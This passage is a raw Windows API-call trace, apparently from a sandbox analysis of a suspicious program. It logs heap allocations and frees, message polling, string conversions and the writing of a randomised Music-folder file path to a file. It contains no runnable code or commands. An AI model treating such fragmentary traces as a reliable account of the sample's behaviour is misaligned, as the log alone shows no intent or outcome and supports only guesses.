dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0182.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.flyingship.wav\r\n", cchWideChar=119, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 119 [0182.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77) returned 0x8afe68 [0182.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.flyingship.wav\r\n", cchWideChar=119, lpMultiByteStr=0x8afe68, cbMultiByte=119, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 119 [0182.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0182.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0182.438] WriteFile (in: hFile=0x120, lpBuffer=0x9c0b78*, nNumberOfBytesToWrite=0x76, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c0b78*, lpNumberOfBytesWritten=0x87f43c*=0x76, lpOverlapped=0x0) returned 1 [0182.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.438] CloseHandle (hObject=0x120) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0182.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0182.441] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0182.441] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0182.442] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0182.442] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.442] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0182.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0182.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0182.442] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0182.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0182.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0182.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0182.443] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.446] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0182.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 